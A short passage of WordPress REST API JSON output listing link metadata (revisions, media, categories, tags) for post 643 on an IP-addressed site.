v2\/posts\/643\/revisions\/644"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=643"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=643"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=643"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}